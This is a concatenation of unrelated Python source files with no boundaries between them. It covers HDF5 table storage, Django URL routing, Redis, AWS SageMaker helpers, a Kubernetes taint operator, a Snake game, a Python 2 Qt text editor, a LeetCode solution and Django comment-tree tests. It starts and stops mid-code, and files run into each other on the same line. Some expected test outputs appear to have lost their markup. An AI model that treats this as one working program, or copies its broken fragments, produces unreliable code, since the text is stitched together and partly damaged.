re.match(r'[osc](\d+)', col_dtype): m = re.match(r'[osc](\d+)', col_dtype) size = int(m.group(1)) self._create_column(h5, colpath, atom=tb.StringAtom(size), shape=shape, expectedrows=expectedrows) else: raise Exception(f'Unrecognized col_dtype: {col_dtype}') def _create_column_from_data(self, h5: tb.File, table_path: str, col_name: str, data: (list, tuple, np.ndarray), expectedrows: int=10000) -> str: if isinstance(data[0], str): objdt = 's' elif isinstance(data[0], (list, tuple, dict, bytes)): data = [msgpack_dumps(x, compress=False) for x in data] objdt = 'o' elif not isinstance(data[0], (int, float, np.int, np.float, np.ndarray)): raise Exception(f"Unknown type in col: {col_name} type:{type(data[0])} in {self._h5file}") earray_col = self._create_column(h5, self._path(table_path, col_name), data=data, expectedrows=expectedrows) if re.match(r'[if]', str(earray_col.dtype)): m = re.match(r'([if])', str(earray_col.dtype)) dtype = m.group(1) elif re.search(r'S(\d+)', str(earray_col.dtype)): m = re.search(r'S(\d+)', str(earray_col.dtype)) dtype = f'{objdt}{m.group(1)}' else: raise Exception(f"Corruption possible: Unallowed datatype in created column " f"{table_path}/{col_name}: {str(earray_col.dtype)} in {self._h5file}") return dtype def list_nodes(self, path='/', node_type='EArray'): """ List all nodes found in path. :param path: Starting path to look for tables. :return: """ with self.open(mode='r') as h5: allnodes = [] for g in h5.walk_nodes(path, classname=node_type): # if len(g._v_groups) == 0: allnodes.append(g._v_pathname) return allnodes def delete_rows(self, table_path: str, query: Union[list, tuple]=(), rows: Optional[list]=None) -> None: """ Delete the rows in the ctable. Specified by EITHER query OR rows. If rows is specified those rows will be deleted. IMPORTANT: rows may be shuffled in the table after delete to free space, so row order will not be preserved. For query use see :meth:`.read_ctable` :param table_path: path to table. :param query: rows meeting these conditions will be deleted. :param rows: list of integers corresponding to the rows in the table that should be deleted. 
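A minimal sketch of both deletion modes (table and column names are illustrative; specify either query or rows, never both)::

    h = SimpaHdf5('myfile.h5')
    # delete rows matching a query
    h.delete_rows('mytable_1', query=[('col1', '>', 2)])
    # or delete explicit row indices
    h.delete_rows('mytable_1', rows=[0, 3, 7])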
:return: """ if query and rows: raise Exception(f"Both query and rows specified in {self._h5file}") elif not query and not rows: raise Exception(f"Either query/match or rows MUST be specified in {self._h5file}") with self.open(mode='a') as h5: simpah5_attrs = self._read_attrs(h5, table_path) col_dtype = simpah5_attrs[ATTR_COLDTYPE] if rows: inds = rows elif query: # return a dictionary of node name to node pointers node_data = h5.get_node(self._norm_path(table_path))._v_children inds = _filter_inds(node_data, query) inds = np.nonzero(inds)[0] else: raise NotImplementedError('match not implemented yet') if len(inds) != 0: for col in col_dtype: col_path = self._path(table_path, col) node = self._get_col(h5, col_path) self._remove_array_rows(node, inds) def _remove_array_rows(self, node: tb.EArray, rm_rows: Union[list, tuple]): """ Reorganize array by re-writing(moving) the minimal number of rows in order to delete all specified rows and to truncate the array without losing data. * any rows after len(node)-len(rm_rows) must be moved since they will be truncated * only those rows after len(node)-len(rm_rows) that are to be kept must be moved ensure same rows are not overwritten :param node: h5 node :param rm_rows: list of row indicies to remove :return: """ node_len = len(node) rm_rows = np.array(sorted(set(rm_rows))) num_rm = len(rm_rows) # determine last row index (non-inclusive) that needs to be moved last_row = node_len - num_rm # compute the set of rows that are past the last row dont_worry_rows = set(rm_rows[rm_rows >= last_row]) # compute the rows that need to be moved move_rows = set(range(last_row, node_len)).difference(dont_worry_rows) move_rows = sorted(move_rows) # compute the new set of rows to replace with the move rows replace_rows = sorted(set(rm_rows[rm_rows < last_row])) if len(move_rows) != len(replace_rows): raise Exception(f'Something is wrong with the length of the move {len(move_rows)} and replace ' f'{len(replace_rows)} rows in {self._h5file}') # shift rows at the end of the file into the row to remove to minimize number of writes for i in range(len(move_rows)): node[replace_rows[i]] = node[move_rows[i]] # delete the end of the array that was moved to the removed nodes node.truncate(len(node) - num_rm) def table_info(self, table_name: str) -> dict: """ Read the table information including column datatypes and flavor. Returns empty dictionary if table doesn't exist. 
Info returned as keys of dictionary:: * col_dtype: dict of column data types * col_flavor: dict of column flavors * num_rows: number of rows in table :param table_name: table name :return """ with self.open(mode='r') as h5: return self._table_info(h5, table_name) def table_nrows(self, table_name: str) -> int: """ Return the number of rows in the table :param table_name: :return: """ return self.table_info(table_name).get(ATTR_NROWS, 0) def _table_info(self, h5, table_name: str) -> dict: simpah5_attrs = self._read_attrs(h5, table_name) if len(simpah5_attrs) > 0: for colname in simpah5_attrs[ATTR_COLDTYPE]: node = self._get_col(h5, self._path(table_name, colname)) simpah5_attrs[ATTR_NROWS] = int(node.shape[0]) break return simpah5_attrs def _safe_col_str_change(self, h5: tb.File, colpath: str, coldtype: str, data: (list, tuple), resize: bool): colnode = self._get_col(h5, colpath) if colnode is None: raise Exception(f"Table column doesn't exist: {colpath} in {self._h5file}") m = re.match(r'[osc](\d+)', coldtype) if not m: raise Exception(f'Col dtype for column {colpath} should be [osc] and is not: {coldtype} in {self._h5file}') size = int(m.group(1)) m = re.search(r's(\d+)', str(data.dtype).lower()) if not m: raise Exception(f'Data in column {colpath} should be similar to {coldtype} and is {data.dtype}' f' in {self._h5file}') dlen = int(m.group(1)) if dlen > size: if not resize: msg = f"Data corruption happening in {colpath}. Table may be corrupted." \ f"Serialized data len ({dlen}) > ({size + 1}) in {self._h5file}" raise Exception(msg) else: logging.warning(f"Changing column size to {dlen} and overwriting ... {colpath}") # safely rewrite data at expense of memory and time tmp_col_path = colpath + '_tmp' # create new column of desired shape newcolnode = self._create_column(h5, tmp_col_path, atom=tb.StringAtom(dlen)) # re-write all data into that column # newcolnode.append(colnode[:]) for idx, row in enumerate(colnode.iterrows()): newcolnode.append([row]) # clean up old path and point to new path h5.remove_node(colpath) colname = os.path.basename(colpath) table_path = os.path.dirname(colpath) h5.rename_node(tmp_col_path, colname) # update attributes colnode = self._get_col(h5, colpath) m = re.search(r'S(\d+)', str(colnode.dtype)) new_len = int(m.group(1)) simpah5_attrs = self._read_attrs(h5, table_path) col_dtypes = simpah5_attrs[ATTR_COLDTYPE] m = re.match(r'([os])', col_dtypes[colname]) col_dtypes[colname] = f'{m.group(1)}{new_len}' _ = self._write_attrs(h5, table_path, ATTR_COLDTYPE, col_dtypes) return colnode def repack(self) -> None: """ Re-write entire file which has the effect of recompressing data efficiently and eliminating free space. Should generally be run periodically if files are written to largely or modified. :return: """ tmp_name = self._h5file + '.' + str(uuid.uuid4()) with self.open(mode='r') as h5: h5.copy_file(tmp_name, filters=self._filters) os.remove(self._h5file) os.rename(tmp_name, self._h5file) # write repack timestamp with self.open(mode='a') as h5: data = [datetime.now().timestamp(), h5.get_filesize()] try: h5.get_node('/_last_repack')[:] = data except AttributeError: h5.create_array('/', '_last_repack', obj=data) from django.conf.urls import url from . 
import views from django.conf import settings from django.conf.urls.static import static from django.urls import re_path, path, include from .views import home, edit_profile, projects, signup, profile, upload, index # from django.contrib.auth import views from django.contrib.auth import views as auth_views from django_registration.backends.one_step.views import RegistrationView urlpatterns = [ url('^$', views.index, name='awwards'), url(r'^home/', views.home, name='home'), url(r'^search/', views.search_results, name='search_results'), path('profile//', profile, name='profile'), path('registration_form/', views.signup, name='signup'), path('project/', projects, name='project'), path('upload/', views.upload, name='upload'), path('profile//settings', edit_profile, name='edit_profile'), path('account/', include('django.contrib.auth.urls')), ] if settings.DEBUG: urlpatterns+= static(settings.MEDIA_URL, document_root = settings.MEDIA_ROOT)import redis def most_active_commenters(r: redis.Redis, n=10): result = sorted( (int(r.get(k)), k.decode()) for k in r.keys('comments:*') )[-n:] return list(reversed(result))awslabs/sagemaker-handwritten-text-recognitionsagemaker/src/sm_utils.py import boto3 import os import tarfile from urllib.parse import urlparse def get_cognito_configs(): ''' Helper function to get a previously defined cognito user pool. Returns None if there is no previously defined cognitor user pool Return: ------ cognito_config: {str: str} containing the client id and userpool ''' sm_client = boto3.client('sagemaker') workforces = sm_client.list_workforces() if len(workforces["Workforces"]) > 0: return workforces["Workforces"][0]["CognitoConfig"] else: return None def get_signup_domain(workteam_name): ''' Returns: ------- ''' sm_client = boto3.client('sagemaker') workteams = sm_client.list_workteams() for workteam in workteams["Workteams"]: if workteam["WorkteamName"] == workteam_name: subdomain = workteam["SubDomain"] return "https://{}/logout".format(subdomain) return None def parse_s3_url(s3_url): o = urlparse(s3_url, allow_fragments=False) return o.netloc, o.path[1:] def get_latest_training_job(name_contains): sagemaker_client = boto3.client('sagemaker') response = sagemaker_client.list_training_jobs( NameContains=name_contains, StatusEquals='Completed' ) training_jobs = response['TrainingJobSummaries'] assert len(training_jobs) > 0, "Couldn't find any completed training jobs with '{}' in name.".format(name_contains) latest_training_job = training_jobs[0]['TrainingJobName'] return latest_training_job def get_model_data(training_job): sagemaker_client = boto3.client('sagemaker') response = sagemaker_client.describe_training_job(TrainingJobName=training_job) assert 'ModelArtifacts' in response, "Couldn't find ModelArtifacts for training job." 
return response['ModelArtifacts']['S3ModelArtifacts'] def parse_model_data(s3_location, save_dir): s3_client = boto3.client('s3') bucket, key = parse_s3_url(s3_location) key = key.replace("model.tar.gz", "output.tar.gz") s3_client.download_file(Bucket=bucket, Key=key, Filename=os.path.basename(key)) tar = tarfile.open(os.path.basename(key)) tar.extractall(path=save_dir) tar.close()from __future__ import annotations import json import logging import kopf from kubernetes import client, config MATCH_LABELS_KEY = "matchLabels" WANTED_TAINTS_KEY = "wantedTaints" UNWANTED_TAINTS_KEY = "unwantedTaints" WANTS_TAINTS_KEY = "nodetaintmgr.k8s.lanvstn.be/wants-taints" logging.basicConfig(level=logging.DEBUG) config.load_kube_config() def load_taint(taint: dict) -> str: """taints are handled as json strings because their dict form is unhashable""" return json.dumps(dict(sorted(taint.items()))) @kopf.index("nodetaintrules.k8s.lanvstn.be") def rule_index(spec: dict, **_): return { (label_k, label_v): { WANTED_TAINTS_KEY: spec.get(WANTED_TAINTS_KEY, []), UNWANTED_TAINTS_KEY: spec.get(UNWANTED_TAINTS_KEY, []), } for label_k, label_v in spec.get(MATCH_LABELS_KEY, {"": ""}).items() } @kopf.on.resume("node") @kopf.on.create("node") @kopf.on.field("node", field="spec.taints") @kopf.on.field("node", field=("metadata", "annotations", WANTS_TAINTS_KEY)) # tuple field format because of dots in key def handle_node(name: str, spec: dict, labels: dict, rule_index: kopf.Index, **_): old_state = set([load_taint(taint) for taint in spec.get("taints", [])]) desired_state = old_state.copy() matching_rules = [ rule_resources for label, rule_resources in rule_index.items() if label in labels.items() or label == ("", "") ] for rule_resources in matching_rules: for rule in rule_resources: desired_state |= set([load_taint(taint) for taint in rule.get(WANTED_TAINTS_KEY, [])]) desired_state -= set([load_taint(taint) for taint in rule.get(UNWANTED_TAINTS_KEY, [])]) if old_state != desired_state: logging.info(f"updating taints for node: {name}") logging.info(f"new taints: {desired_state}") v1 = client.CoreV1Api() v1.patch_node(name, {"spec": {"taints": [json.loads(taint) for taint in desired_state]}}) @kopf.on.event("nodetaintrules.k8s.lanvstn.be") def handle_rule(name, namespace, spec, **_): logging.info(f"handling nodetaintule {namespace}/{name} {spec}") # Trick to force reconcile by changing an annotation field which we watch # TODO: trigger handle_node without having to resort to this v1 = client.CoreV1Api() nodes = v1.list_node().items node: client.V1Node for node in nodes: v1.patch_node( node.metadata.name, { "metadata": { "annotations": {WANTS_TAINTS_KEY: str(int(node.metadata.annotations.get(WANTS_TAINTS_KEY, 0)) + 1)} } }, ) IhebHaboubi/snake import random import pygame class Snake: def __init__(self, window, obj): self.color = obj["body_color"] self.food_color = obj["food_color"] self.size = obj["size"] self.length = obj["length"] self.window = window self.height = window.get_height() self.width = window.get_width() self.rows = self.height // self.size self.cols = self.width // self.size self.possible_x = set(i * self.size for i in range(self.cols)) self.possible_y = set(i * self.size for i in range(self.rows)) # x[0] and y[0] head of the snake self.x = [self.size * i for i in range(5 + self.length, 5, -1)] self.y = [self.size * (self.rows // 2)] * self.length # initialise direction to right self._direction = [1, 0] @property def direction(self): return self._direction @direction.setter def direction(self, value): if 
self._direction != [-x for x in value]: self._direction = value def draw_body(self): for i in range(self.length): rect = (self.x[i], self.y[i], self.size, self.size) pygame.draw.rect(self.window, self.color, rect) def grow(self): # increase the snake size by 1 unit self.length += 1 self.y.append(2 * self.y[-1] - self.y[-2]) self.x.append(2 * self.x[-1] - self.x[-2]) def move(self): # each part of the snake takes the previous position of the one in front of it for i in range(self.length - 1, 0, -1): self.x[i] = self.x[i - 1] self.y[i] = self.y[i - 1] self.x[0] += self.direction[0] * self.size self.y[0] += self.direction[1] * self.size @property def ate(self): return (self.x[0], self.y[0]) == self.food @property def crashed(self): # check if the snake collides with itself if (self.x[0], self.y[0]) in zip(self.x[1:], self.y[1:]): return True # check if the snake collides with the wall if not 0 <= self.x[0] < self.width: return True if not 0 <= self.y[0] < self.height: return True return False def spawn_food(self): # food cordinates should be a multiple of the snake size # and it should not appear on top of the snake x = tuple(self.possible_x - set(self.x)) y = tuple(self.possible_y - set(self.y)) self.food = random.choice(x), random.choice(y) def draw_food(self): x, y = self.food rect = (x, y, self.size, self.size) pygame.draw.rect(self.window, self.food_color, rect) import sys, string, types, time from qt import * from qtcanvas import * from kuragui.guiconfig import guiConf from kuralib import kuraapp True = 1 False = 0 from dbobj.dbexceptions import dbRecordNotFoundException class CanvasException(Exception): def __init__(self, error): Exception.__init__(self) self.error = error def __repr(self): return self.error def __str(self): return self.error class KuraIlItem(QCanvasText): def __init__(self, text, canvas): if text == None: self.__text = "" elif type(text) not in [types.StringType, types.UnicodeType]: self.__text = str(text) else: self.__text = text QCanvasText.__init__(self, QString(self.__text), canvas) self.setFont(canvas.normalfont) def move(self, p): c = self.canvas() r = self.boundingRect() x = p.x() y = p.y() if c.currentLineHeight < r.height(): c.currentLineHeight = r.height() if x + c.lineSpacing + r.width() > c.maxLineWidth: x = c.leftMargin y = y + c.lineSpacing + c.currentLineHeight c.currentLineHeight = r.height() QCanvasText.move(self, x, y) QCanvasText.show(self) return QPoint(x + r.width() + c.elementSpacing, y) def __repr__(self): r = self.boundingRect() return "%s, x %i, y %i, w %i, h %i (%s)" % \ (str(self.__class__), r.x(), r.y(), r.width(), r.height(), self.__text) class KuraIlTagItem(KuraIlItem): def __init__(self, tag, record, canvas): KuraIlItem.__init__(self, record.getTag(tag).getDescription(), canvas) self.__tag = tag self.__record = record.getTag(tag) def setText(self, text): self.__record.description = (unicode(text)) if self.__record.getPrimaryKey() == None: self.__record.insert() else: self.__record.update() KuraIlItem.setText(self, text) def getRecord(self): return self.__record class KuraIlCanvasTextItem(KuraIlItem): def __init__(self, text, canvas): KuraIlItem.__init__(self, text, canvas) class KuraIlCanvasTextTagItem(KuraIlTagItem): pass class KuraIlCanvasTextTitleItem(KuraIlCanvasTextItem): def __init__(self, record, canvas): KuraIlCanvasTextItem.__init__(self, record.title, canvas) self.__record = record self.setFont(self.canvas().titlefont) def setText(self, text): self.__record.title = unicode(text) if self.__record.getPrimaryKey() == None: 
self.__record.insert() else: self.__record.update() KuraIlCanvasTextItem.setText(self, text) def getRecord(self): return self.__record def move(self, p): QCanvasText.move(self, p.x(), p.y()) QCanvasText.show(self) r = self.boundingRect() return QPoint(self.canvas().leftMargin, r.height() + self.canvas().lineSpacing) class KuraIlCanvasTextDescriptionItem(KuraIlCanvasTextItem): def __init__(self, record, canvas): KuraIlCanvasTextItem.__init__(self, record.description, canvas) self.__record = record def getRecord(self): return self.__record def setText(self, text): self.__record.description = unicode(text) if self.__record.getPrimaryKey() == None: self.__record.insert() else: self.__record.update() KuraIlCanvasTextItem.setText(self, text) def move(self, p): x = p.x() y = p.y() r = self.boundingRect() c = self.canvas() QCanvasText.move(self, c.leftMargin, y) QCanvasText.show(self) return QPoint(c.leftMargin, y + r.height() + c.lineSpacing) class KuraIlCanvasStreamItem(KuraIlItem): def __init__(self, record, canvas): KuraIlItem.__init__(self, record.seqnr, canvas) self.__record = record self.setFont(canvas.boldfont) def setText(self, text): try: i = int(str(text)) except: print "Could not convert %s to int" % unicode(text) return KuraIlItem.setText(self, str(i)) self.__record.seqnr = i if self.__record.getPrimaryKey() == None: self.__record.insert() else: self.__record.update() def getRecord(self): return self.__record def move(self, p): c = self.canvas() x = 10 y = p.y() + c.lineSpacing + c.currentLineHeight c.currentLineHeight = 0 QCanvasText.move(self, x, y) QCanvasText.show(self) return QPoint(c.leftMargin, y) class KuraIlCanvasStreamTagItem(KuraIlTagItem): def __init__(self, tag, record, canvas): KuraIlTagItem.__init__(self, tag, record, canvas) self.setFont(canvas.italicfont) self.__record = record def move(self, p): c = self.canvas() x = c.leftMargin + c.elementSpacing y = p.y() + c.currentLineHeight + c.lineSpacing c.currentLineHeight = 0 QCanvasText.move(self, x, y) QCanvasText.show(self) return QPoint(c.leftMargin, y + c.lineSpacing) class KuraIlCanvasElementItem(KuraIlItem): def __init__(self, record, canvas): KuraIlItem.__init__(self, record.text + "\n" + record.translation(), canvas) self.__record = record def setText(self, text): text = unicode(text) if text.find("\n") > 0: t = unicode(text).split("\n") elif text.find(" ") > 0: t = unicode(text).split(" ") else: t = [text] if len(t) > 1: text, tag = (t[0], " ".join(t[1:])) else: text, tag = (text, None) self.__record.text = unicode(t[0]) if self.__record.getPrimaryKey() == None: self.__record.insert() else: self.__record.update() if tag: self.__record.setGlosse(tag) else: tag = self.__record.translation(False) KuraIlItem.setText(self, text + "\n" + tag) def getRecord(self): return self.__record class KuraIlCanvasElementTagItem(KuraIlTagItem): pass class kuraIlCanvas(QCanvas): def __init__(self, parent=0, name=0 ): QCanvas.__init__(self, parent, name) self.cursor = QCanvasRectangle(self) self.scol = QCanvasLine(self) self.items = [] self.currentItem = -1 self.lineHeight=QFontMetrics(guiConf.textfont).height() self.lineSpacing=QFontMetrics(QFont(guiConf.textfont)).lineSpacing() + 5 self.lineSetSpacing = 5 self.elementSpacing = 8 self.leftMargin = 50 self.rightMargin = 20 self.topMargin = 10 self.maxLineWidth = 500 self.normalfont = QFont(guiConf.textfont.family(), guiConf.textfont.pointSize(), QFont.Normal, False) self.italicfont = QFont(guiConf.textfont.family(), guiConf.textfont.pointSize(), QFont.Normal, False) self.boldfont = 
QFont(guiConf.textfont.family(), guiConf.textfont.pointSize(), QFont.Bold, False) self.bolditalicfont = QFont(guiConf.textfont.family(), guiConf.textfont.pointSize(), QFont.Bold, False) self.titlefont = QFont(guiConf.textfont.family(), guiConf.textfont.pointSize() * 2, QFont.Bold, False) def redisplay(self, start = 0): self.currentLineHeight = 0 if type(start) != types.IntType: try: start = self.items.index(start) except ValueError: print "ValueError:", start, "not in items" start = 0 if start == 0: p = QPoint(self.leftMargin, self.topMargin) else: p = previousItem.boundingRect().bottomRight() for item in self.items[start:]: p = item.move(p) y = self.items[-1].y() + self.currentLineHeight + self.lineSpacing self.scol.setPoints(self.leftMargin - 5, 0, self.leftMargin - 5, y) self.scol.show() def handleStream(self, stream): item = KuraIlCanvasStreamItem(stream, self) self.items.append(item) for element in stream.getElements(): self.items.append(KuraIlCanvasElementItem(element, self)) item = KuraIlCanvasStreamTagItem("TR", stream, self) self.items.append(item) def handleText(self, text): # Title object item = KuraIlCanvasTextTitleItem(text, self) self.items.append(item) item = KuraIlCanvasTextDescriptionItem(text, self) self.items.append(item) for stream in text.getStreams(): self.handleStream(stream) def setText(self, lngText): self.lngText = lngText self.handleText(lngText) self.redisplay(0) y = self.items[-1].y() + self.currentLineHeight + self.lineSpacing self.resize(self.maxLineWidth + self.leftMargin + self.rightMargin, y + 400) self.currentItem = 0 self.setCursor() self.update() def setCursor(self, pos = None): if pos == None: try: i = self.items[self.currentItem] except IndexError: return else: try: i = self.collisions(pos)[0] if i not in self.items: raise IndexError, "Wrong one" self.currentItem = self.items.index(i) except IndexError, e: try: return self.items[self.currentItem] except: return r = i.boundingRect() self.cursor.move(r.x() -2, r.y() -2) self.cursor.setSize(r.width() + 4, r.height() + 4) self.cursor.setZ(-1.0) self.cursor.setPen(QPen(QColor(Qt.gray), 2, Qt.DashLine)) self.cursor.show() self.update() return i def getCurrentItem(self): if len(self.items) < 1: return None else: if self.currentItem < 0: return self.items[0] elif self.currentItem > len(self.items) - 1: return self.items[-1] else: return self.items[self.currentItem] def nextItem(self): self.currentItem += 1 if self.currentItem >= len(self.items): self.currentItem = len(self.items) self.setCursor() return self.getCurrentItem() def previousItem(self): self.currentItem -= 1 if self.currentItem < 0: self.currentItem = 0 self.setCursor() return self.getCurrentItem() def firstItem(self): self.currentItem = 0 self.setCursor() return self.getCurrentItem() def lastItem(self): self.currentItem = len(self.items) - 1 self.setCursor() return self.getCurrentItem() def deleteItem(self): if self.currentItem > -1 and self.currentItem < len(self.items): item = self.getCurrentItem() item.setCanvas(None) r = item.getRecord() if r.getPrimaryKey() != None: r.delete(True) del self.items[self.currentItem] self.redisplay(0) self.setCursor() return item else: return self.getCurrentItem() def setItemText(self, item, text): item.setText(text) def up(self): y = self.getCurrentItem().y() i = self.currentItem while i > 0: i -= 1 if self.items[i].y() != y: break self.currentItem = i self.setCursor() return self.getCurrentItem() def down(self): y = self.getCurrentItem().y() i = self.currentItem while i < len(self.items) - 1: i += 1 if 
self.items[i].y() != y: break self.currentItem = i self.setCursor() return self.getCurrentItem() def insertItem(self, item): if self.currentItem == len(self.items) - 1: self.items.append(item) else: self.items.insert(self.currentItem + 1, item) self.currentItem = self.currentItem + 1 self.renumber() self.redisplay(0) self.setCursor() def renumber(self): strm_pknr = -1 strm_seqnr = 0 elmt_seqnr = 0 for i in self.items: if i.__class__ == KuraIlCanvasStreamItem: i.setText(str(strm_seqnr)) r = i.getRecord() r.seqnr = strm_seqnr r.textnr = self.lngText.textnr if r.getPrimaryKey() == None: r.insert() strm_pknr = r.getPrimaryKey() strm_seqnr += 1 elmt_seqnr = 0 elif i.__class__ == KuraIlCanvasElementItem: r = i.getRecord() r.seqnr = elmt_seqnr r.textnr = self.lngText.textnr r.streamnr = strm_pknr if r.getPrimaryKey() == None: r.insert() elmt_seqnr += 1 def insertElement(self, record): if not self.items[self.currentItem].__class__ == KuraIlCanvasElementItem: i = self.currentItem while i >= 0: if self.items[i].__class__ == KuraIlCanvasStreamItem: break if self.items[i].__class__ == KuraIlCanvasStreamTagItem: i = -1 break i -= 1 if i == -1: raise CanvasException("NoStreamDefinedError") item = KuraIlCanvasElementItem(record, self) self.insertItem(item) return item def insertStream(self, record): item = KuraIlCanvasStreamItem(record, self) self.insertItem(item) return item __copyright__=""" copyright : (C) 2002 by see copyright notice for license email : """ __revision__="""$Revision: 1.21 $"""[11:-2] # Time: O(m * n * k * (m + n)) # Space: O(m * n * k) class Solution(object): def ways(self, pizza, k): """ :type pizza: List[str] :type k: int :rtype: int """ MOD = 10**9+7 prefix = [[0]*len(pizza[0]) for _ in range(len(pizza))] for j in reversed(range(len(pizza[0]))): accu = 0 for i in reversed(range(len(pizza))): accu += int(pizza[i][j] == 'A') prefix[i][j] = (prefix[i][j+1] if (j+1 < len(pizza[0])) else 0) + accu dp = [[[0]*k for _ in range(len(pizza[0]))] for _ in range(len(pizza))] for i in reversed(range(len(pizza))): for j in reversed(range(len(pizza[0]))): dp[i][j][0] = 1 for m in range(1, k): for n in range(i+1, len(pizza)): if prefix[i][j] == prefix[n][j]: continue if prefix[n][j] == 0: break dp[i][j][m] = (dp[i][j][m] + dp[n][j][m-1]) % MOD for n in range(j+1, len(pizza[0])): if prefix[i][j] == prefix[i][n]: continue if prefix[i][n] == 0: break dp[i][j][m] = (dp[i][j][m] + dp[i][n][m-1]) % MOD return dp[0][0][k-1] from datetime import datetime from textwrap import dedent from os.path import join, dirname from django.contrib.contenttypes.models import ContentType from django.contrib.sites.models import Site from django.conf import settings from django.test import TestCase as DjangoTestCase from django_comments_tree.models import (TreeComment, CommentAssociation, MaxThreadLevelExceededException) from django_comments_tree.tests.models import Article, Diary class ArticleBaseTestCase(DjangoTestCase): def setUp(self): self.article_1 = Article.objects.create( title="September", slug="september", body="During September...") self.article_2 = Article.objects.create( title="October", slug="october", body="What I did on October...") class TreeCommentManagerTestCase(ArticleBaseTestCase): def setUp(self): super().setUp() self.article_ct = ContentType.objects.get(app_label="tests", model="article") self.site1 = Site.objects.get(pk=1) self.site2 = Site.objects.create(domain='site2.com', name='site2.com') self.root_1 = TreeComment.objects.get_or_create_root(self.article_1) self.root_1_pk = self.root_1.pk 
self.root_2 = TreeComment.objects.get_or_create_root(self.article_1, site=self.site2) self.root_2_pk = self.root_2.pk with open(join(dirname(__file__), 'data/draftjs_raw.json'), 'r') as fp: self.draft_raw = fp.read() def post_comment_1(self): r = TreeComment.objects.get(pk=self.root_1_pk) r.add_child(comment="just a testing comment") def post_comment_2(self): r = TreeComment.objects.get(pk=self.root_2_pk) r.add_child(comment="yet another comment") def post_comment_3(self): r = TreeComment.objects.get(pk=self.root_1_pk) r.add_child(comment="and another one") def post_comment_4(self): r = TreeComment.objects.get(pk=self.root_2_pk) r.add_child(comment="just a testing comment in site2") def test_for_app_models(self): # there is no comment posted yet to article_1 nor article_2 count = TreeComment.objects.for_app_models("tests.article").count() self.assertEqual(count, 0) self.post_comment_1() count = TreeComment.objects.for_app_models("tests.article").count() self.assertEqual(count, 1) self.post_comment_2() count = TreeComment.objects.for_app_models("tests.article").count() self.assertEqual(count, 2) self.post_comment_3() count = TreeComment.objects.for_app_models("tests.article").count() self.assertEqual(count, 3) self.post_comment_4() count = TreeComment.objects.for_app_models("tests.article").count() self.assertEqual(count, 4) def test_multi_site_for_app_models(self): self.post_comment_1() # To site1. self.post_comment_4() # To site2. count_site1 = TreeComment.objects.for_app_models("tests.article", site=self.site1).count() self.assertEqual(count_site1, 1) count_site2 = TreeComment.objects.for_app_models("tests.article", site=self.site2).count() self.assertEqual(count_site2, 1) def test_get_root_on_invalid_obj(self): """ get_root should return None with invalid obj""" r = TreeComment.objects.get_root(self.article_2) self.assertIsNone(r, 'Expected no root to be found') def test_create_comment_for_obj(self): """ Test out the custom manager method """ comment = 'Test Value' c = TreeComment.objects.create_for_object( self.article_2, comment=comment ) self.assertEqual(c.comment.raw, comment, "Expected to create new comment here") def test_create_markdown_comment(self): """ Validate a very basic markdown render """ comment = dedent(''' #Heading Body Text ''').strip() comment_rendered = dedent('''

    Heading

    Body Text

    ''').strip() c = TreeComment.objects.create_for_object( self.article_2, comment=comment, comment_markup_type='markdown' ) self.assertEqual(c.comment.raw, comment, "Expected raw comment to match original") self.assertEqual(c.comment.rendered, comment_rendered, "Expected rendered to match markdown output") def test_create_draftail_comment(self): """ Validate a very basic draftjs render """ comment_rendered = dedent('''

    Text 1.

    Test 2.

    ''').strip() c = TreeComment.objects.create_for_object( self.article_2, comment=self.draft_raw, comment_markup_type='draftjs' ) self.assertEqual(c.comment.raw, self.draft_raw, "Expected raw comment to match original") self.assertEqual(c.comment.rendered, comment_rendered, "Expected rendered to match markdown output") # ToDo: in_moderation, for_model, count_for_content_types # ToDo: CommentAssociation: object_pk # In order to test methods 'save' and '_calculate_thread_data', simulate the # following threads, in order of arrival: # # testcase cmt.id parent level-0 level-1 level-2 # step1 1 - c1 <- cmt1 # step1 2 - c2 <- cmt2 # step2 3 1 -- c3 <- cmt1 to cmt1 # step2 4 1 -- c4 <- cmt2 to cmt1 # step3 5 2 -- c5 <- cmt1 to cmt2 # step4 6 5 -- -- c6 <- cmt1 to cmt1 to cmt2 # step4 7 4 -- -- c7 <- cmt1 to cmt2 to cmt1 # step5 8 3 -- -- c8 <- cmt1 to cmt1 to cmt1 # step5 9 - c9 <- cmt9 def thread_test_step_1(article): """ Add Two Comments for the article root - comment 1 comment 2 """ site = Site.objects.get(pk=1) #TreeComment.objects.create() # post Comment 1 with parent_id 0 root = TreeComment.objects.get_or_create_root(article, site=site) root.add_child(comment="comment 1 to article", submit_date=datetime.now()) root.refresh_from_db() # post Comment 2 with parent_id 0 root.add_child(comment="comment 2 to article", submit_date=datetime.now()) root.refresh_from_db() def thread_test_step_2(article): """ Add 2 replies to the first comment root - comment 1 reply 1 reply 2 comment 2 """ site = Site.objects.get(pk=1) root = TreeComment.objects.get_or_create_root(article, site=site) children = root.get_children() c1 = children[0] # post Comment 3 to parent_id 1 c1.add_child(comment="comment 1 to comment 1") # post Comment 4 to parent_id 1 c1.add_child(comment="comment 2 to comment 1") def thread_test_step_3(article): """ root - comment 1 reply 1 reply 2 comment 2 reply 1 """ site = Site.objects.get(pk=1) root = TreeComment.objects.get_or_create_root(article, site=site) c2 = root.get_children()[1] c2.add_child(comment="comment 1 to comment 2") def thread_test_step_4(article): """ root - comment 1 reply 1 reply 2 reply 2.1 comment 2 reply 1 reply 1.1 """ site = Site.objects.get(pk=1) root = TreeComment.objects.get_or_create_root(article, site=site) c1, c2 = root.get_children() c1_children = c1.get_children() c2_children = c2.get_children() c2_children[0].add_child(comment="cmt 1 to cmt 1 to cmt 2") c1_children[1].add_child(comment="cmt 1 to cmt 2 to cmt 1") def thread_test_step_5(article): """ Adds comments out to level 4 root - comment 1 reply 1 reply 2 reply 2.1 reply 2.1.1 comment 2 reply 1 reply 1.1 reply 1.1.1 """ site = Site.objects.get(pk=1) root = TreeComment.objects.get_or_create_root(article, site=site) c1, c2 = root.get_children() c1_children = c1.get_children() c2_children = c2.get_children() c1_grandchildren_list = [c.get_children() for c in c1_children] c2_grandchildren_list = [c.get_children() for c in c2_children] for i, gc in enumerate(c1_grandchildren_list): for g in gc: g.add_child(comment=f'cmt1 to cmt{i} to cmt1 to cmt1') for i, gc in enumerate(c2_grandchildren_list): for g in gc: g.add_child(comment=f'cmt1 to cmt{i} to cmt1 to cmt2') class BaseThreadStep1TestCase(ArticleBaseTestCase): def setUp(self): super().setUp() thread_test_step_1(self.article_1) def test_threaded_comments_step_1_level_0(self): # comment 1 root = TreeComment.objects.get_root(self.article_1) self.assertEqual(root.get_descendant_count(), 2, "Expected to have 2 